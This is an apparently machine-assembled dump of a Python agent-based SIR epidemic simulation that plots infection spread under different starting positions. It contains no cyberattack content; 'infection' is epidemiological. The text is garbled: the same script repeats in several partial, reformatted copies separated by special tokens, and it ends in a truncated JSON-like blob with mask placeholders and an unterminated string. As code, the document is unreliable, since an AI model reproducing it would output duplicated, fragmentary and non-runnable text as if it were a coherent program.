for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
plotcenterrange()
<|reserved_special_token_0|>
print('p = 0.05, starting randomly, the total infected number is ' + str(
valuerandom))
print('p = 0.05, starting from corner, the total infected number is ' + str
(valuecorner))
print('p = 0.05, starting from center, the total infected number is ' + str
(valuecenter))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('../')
<|reserved_special_token_0|>
p = Person()
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
run_Simulation2(0.6, N=20000, T=30, start=10)
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
plotcenterrange()
<|reserved_special_token_0|>
valuecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcorner=True)[0]
valuecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcenter=True)[0]
valuerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)))[0]
print('p = 0.05, starting randomly, the total infected number is ' + str(
valuerandom))
print('p = 0.05, starting from corner, the total infected number is ' + str
(valuecorner))
print('p = 0.05, starting from center, the total infected number is ' + str
(valuecenter))
<|reserved_special_token_1|>
import sys
import os
import numpy as np
import math
sys.path.append('../')
from sir.improveagent import *
import numpy as np
import numpy.linalg as la
import matplotlib.pyplot as plt
from scipy.spatial import KDTree
from scipy.spatial import cKDTree
from scipy.spatial.distance import pdist
import networkx as nx
p = Person()
def run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=
False, startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [(i / N) for i in recover]
newsuspect = [(s / N) for s in suspect]
newinfect = [(i / N) for i in infect]
plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')
plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')
plt.plot(range(T + 1), newinfect, label='i: percentage of infected')
plt.xlabel('T')
plt.ylabel('percentage')
plt.title('Percentage of Population, Discrete')
plt.legend()
plt.show()
run_Simulation2(0.6, N=20000, T=30, start=10)
def checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,
startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N - start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected()
if startcenter:
resetcenter(start, pop)
if startcorner:
resetcorner(start, pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand() < k:
pop[j].get_recovered()
return np.array([(count_infect(pop) + count_recover(pop)) / N,
count_infect(pop) / N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02, 0.1, 0.02)
plist = np.arange(0.1, 1, 0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(
2 / (20000 * math.pi)), startcenter=True)[0])
plt.plot(np.hstack((plist1, plist)), infectlist)
plt.title('centerplot')
plt.xlabel('p')
plt.ylabel('total number of individuals infected')
plt.title('Total Number of Individuals Infected vs p')
plt.show()
plotcenterrange()
<|reserved_special_token_0|>
valuecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcorner=True)[0]
valuecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)), startcenter=True)[0]
valuerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (
20000 * math.pi)))[0]
print('p = 0.05, starting randomly, the total infected number is ' + str(
valuerandom))
print('p = 0.05, starting from corner, the total infected number is ' + str
(valuecorner))
print('p = 0.05, starting from center, the total infected number is ' + str
(valuecenter))
<|reserved_special_token_1|>
import sys
import os
import numpy as np
import math
sys.path.append("../")
from sir.improveagent import *
import numpy as np
import numpy.linalg as la
import matplotlib.pyplot as plt
#from sklearn.neighbors import BallTree
from scipy.spatial import KDTree
from scipy.spatial import cKDTree
from scipy.spatial.distance import pdist
import networkx as nx
p = Person()
def run_Simulation2(k,N=100,T=10,start = 1,p=0.5,q=0.08,startcenter = False,startcorner=False):
"""
run the simulation for the pop
"""
recover = [0]
infect = [start]
suspect = [N-start]
pop = [Person() for i in range(N)]
    ## handle the case where `start` people are infected at the beginning
for i in range(start):
pop[i].get_infected();
if(startcenter):
resetcenter(start,pop)
if(startcorner):
resetcorner(start,pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
#may have problem here
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand()< k:
pop[j].get_recovered()
recover.append(count_recover(pop))
infect.append(count_infect(pop))
suspect.append(count_suspectial(pop))
newrecover = [i/N for i in recover]
newsuspect = [s/N for s in suspect]
newinfect = [i/N for i in infect]
plt.plot(range(T+1),newrecover,label = "r: percentage of removed ")
plt.plot(range(T+1),newsuspect,label = "s: percentage of susceptible")
plt.plot(range(T+1),newinfect,label = "i: percentage of infected")
plt.xlabel("T")
plt.ylabel("percentage")
plt.title("Percentage of Population, Discrete")
plt.legend()
plt.show()
#We run a simulation here, using the default values of p and q
run_Simulation2(0.6,N=20000,T = 30,start=10)
def checkinfectb(k,N,T,start=1,p=0.5,q=0.08,startcenter = False,startcorner=False):
"""
we use this function for checking the total infected people
"""
recover = [0]
infect = [start]
suspect = [N-start]
pop = [Person() for i in range(N)]
np.random.seed(10)
for i in range(start):
pop[i].get_infected();
if(startcenter):
resetcenter(start,pop)
if(startcorner):
resetcorner(start,pop)
np.random.seed(10)
for i in range(T):
for j in range(N):
pop[j].movepos(p)
X = calculatedistance(pop)
tree = cKDTree(X)
for j in range(N):
if pop[j].is_infected():
addvalue = np.array([X[j]])
inds = tree.query_ball_point(addvalue, q)
inds = inds[0]
for l in inds:
if pop[l].is_willinfected():
pop[l].get_infected()
for j in range(N):
if pop[j].is_infected():
if np.random.rand()<k:
pop[j].get_recovered()
return np.array([(count_infect(pop)+count_recover(pop))/N,count_infect(pop)/N])
def plotcenterrange():
"""
show how the total infected people i change with p start from center
"""
plist1 = np.arange(0.02,0.1,0.02)
plist = np.arange(0.1,1,0.1)
infectlist = []
for i in plist1:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0])
plt.plot(np.hstack((plist1,plist)),infectlist)
plt.title("centerplot")
plt.xlabel("p")
plt.ylabel("total number of individuals infected")
plt.title("Total Number of Individuals Infected vs p")
plt.show()
plotcenterrange()
"""
def plotrandomcornerrange():
plist1 = np.arange(0.02,0.1,0.02)
plist = np.arange(0.1,1,0.1)
infectlist = []
infectlist2 = []
infectlist3 = []
for i in plist1:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])
infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])
infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])
for i in plist:
infectlist.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0])
infectlist2.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)))[0])
infectlist3.append(checkinfectb(0.5,20000,30,200,p = i,q = np.sqrt(2/(20000*math.pi)),startcenter = True)[0])
plt.plot(np.hstack((plist1,plist)),infectlist,label = "corner")
plt.plot(np.hstack((plist1,plist)),infectlist2,label = "random")
plt.plot(np.hstack((plist1,plist)),infectlist3,label = "center")
plt.title("Change from random corner center")
plt.xlabel("change of p")
plt.ylabel("change of total infected people")
plt.legend()
plt.show()
"""
#plotrandomcornerrange()
#no need for us to use this function
valuecorner = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcorner=True)[0]
valuecenter = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)),startcenter=True)[0]
valuerandom = checkinfectb(0.5,20000,30,200,p = 0.05,q = np.sqrt(2/(20000*math.pi)))[0]
print("p = 0.05, starting randomly, the total infected number is "+ str(valuerandom))
print("p = 0.05, starting from corner, the total infected number is "+ str(valuecorner))
print("p = 0.05, starting from center, the total infected number is "+ str(valuecenter))
|
flexible
|
{
"blob_id": "92317996f884befd646138cd3a3dc3f8345679f4",
"index": 2122,
"step-1": "<mask token>\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\n<mask token>\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\nsys.path.append('../')\n<mask token>\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\nrun_Simulation2(0.6, N=20000, T=30, start=10)\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\nplotcenterrange()\n<mask token>\nprint('p = 0.05, starting randomly, the total infected number is ' + str(\n valuerandom))\nprint('p = 0.05, starting from corner, the total infected number is ' + str\n (valuecorner))\nprint('p = 0.05, starting from center, the total infected number is ' + str\n (valuecenter))\n",
"step-3": "<mask token>\nsys.path.append('../')\n<mask token>\np = Person()\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\nrun_Simulation2(0.6, N=20000, T=30, start=10)\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\nplotcenterrange()\n<mask token>\nvaluecorner = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcorner=True)[0]\nvaluecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcenter=True)[0]\nvaluerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * 
math.pi)))[0]\nprint('p = 0.05, starting randomly, the total infected number is ' + str(\n valuerandom))\nprint('p = 0.05, starting from corner, the total infected number is ' + str\n (valuecorner))\nprint('p = 0.05, starting from center, the total infected number is ' + str\n (valuecenter))\n",
"step-4": "import sys\nimport os\nimport numpy as np\nimport math\nsys.path.append('../')\nfrom sir.improveagent import *\nimport numpy as np\nimport numpy.linalg as la\nimport matplotlib.pyplot as plt\nfrom scipy.spatial import KDTree\nfrom scipy.spatial import cKDTree\nfrom scipy.spatial.distance import pdist\nimport networkx as nx\np = Person()\n\n\ndef run_Simulation2(k, N=100, T=10, start=1, p=0.5, q=0.08, startcenter=\n False, startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [(i / N) for i in recover]\n newsuspect = [(s / N) for s in suspect]\n newinfect = [(i / N) for i in infect]\n plt.plot(range(T + 1), newrecover, label='r: percentage of removed ')\n plt.plot(range(T + 1), newsuspect, label='s: percentage of susceptible')\n plt.plot(range(T + 1), newinfect, label='i: percentage of infected')\n plt.xlabel('T')\n plt.ylabel('percentage')\n plt.title('Percentage of Population, Discrete')\n plt.legend()\n plt.show()\n\n\nrun_Simulation2(0.6, N=20000, T=30, start=10)\n\n\ndef checkinfectb(k, N, T, start=1, p=0.5, q=0.08, startcenter=False,\n startcorner=False):\n \"\"\"\n we use this function for checking the total infected people\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N - start]\n pop = [Person() for i in range(N)]\n np.random.seed(10)\n for i in range(start):\n pop[i].get_infected()\n if startcenter:\n resetcenter(start, pop)\n if startcorner:\n resetcorner(start, pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand() < k:\n pop[j].get_recovered()\n return np.array([(count_infect(pop) + count_recover(pop)) / N, \n count_infect(pop) / N])\n\n\ndef plotcenterrange():\n \"\"\"\n show how the total infected people i change with p start from center\n \"\"\"\n plist1 = np.arange(0.02, 0.1, 0.02)\n plist = np.arange(0.1, 1, 0.1)\n infectlist = []\n for i in plist1:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n for i in plist:\n infectlist.append(checkinfectb(0.5, 20000, 30, 200, p=i, q=np.sqrt(\n 2 / (20000 * math.pi)), startcenter=True)[0])\n plt.plot(np.hstack((plist1, plist)), infectlist)\n plt.title('centerplot')\n plt.xlabel('p')\n plt.ylabel('total number of individuals infected')\n plt.title('Total Number of Individuals Infected vs p')\n plt.show()\n\n\nplotcenterrange()\n<mask token>\nvaluecorner = checkinfectb(0.5, 20000, 30, 
200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcorner=True)[0]\nvaluecenter = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)), startcenter=True)[0]\nvaluerandom = checkinfectb(0.5, 20000, 30, 200, p=0.05, q=np.sqrt(2 / (\n 20000 * math.pi)))[0]\nprint('p = 0.05, starting randomly, the total infected number is ' + str(\n valuerandom))\nprint('p = 0.05, starting from corner, the total infected number is ' + str\n (valuecorner))\nprint('p = 0.05, starting from center, the total infected number is ' + str\n (valuecenter))\n",
"step-5": "import sys\nimport os\nimport numpy as np\nimport math\nsys.path.append(\"../\")\nfrom sir.improveagent import *\nimport numpy as np\nimport numpy.linalg as la\nimport matplotlib.pyplot as plt\n#from sklearn.neighbors import BallTree\nfrom scipy.spatial import KDTree\nfrom scipy.spatial import cKDTree\nfrom scipy.spatial.distance import pdist\nimport networkx as nx\n\np = Person()\n\ndef run_Simulation2(k,N=100,T=10,start = 1,p=0.5,q=0.08,startcenter = False,startcorner=False):\n \"\"\"\n run the simulation for the pop\n \"\"\"\n recover = [0]\n infect = [start]\n suspect = [N-start]\n pop = [Person() for i in range(N)]\n ##we need to change the code for the case start people infected\n for i in range(start):\n pop[i].get_infected();\n if(startcenter):\n resetcenter(start,pop)\n if(startcorner):\n resetcorner(start,pop)\n np.random.seed(10)\n for i in range(T):\n for j in range(N):\n pop[j].movepos(p)\n X = calculatedistance(pop)\n tree = cKDTree(X)\n for j in range(N):\n if pop[j].is_infected():\n addvalue = np.array([X[j]])\n inds = tree.query_ball_point(addvalue, q)\n inds = inds[0]\n #may have problem here\n for l in inds:\n if pop[l].is_willinfected():\n pop[l].get_infected()\n\n for j in range(N):\n if pop[j].is_infected():\n if np.random.rand()< k:\n pop[j].get_recovered()\n\n recover.append(count_recover(pop))\n infect.append(count_infect(pop))\n suspect.append(count_suspectial(pop))\n newrecover = [i/N for i in recover]\n newsuspect = [s/N for s in suspect]\n newinfect = [i/N for i in infect]\n plt.plot(range(T+1),newrecover,label = \"r: percentage of removed \")\n plt.plot(range(T+1),newsuspect,label = \"s: percentage of susceptible\")\n plt.plot(range(T+1),newinfect,label = \"i: percentage of infected\")\n plt.xlabel(\"T\")\n plt.ylabel(\"percentage\")\n plt.title(\"Percentage of 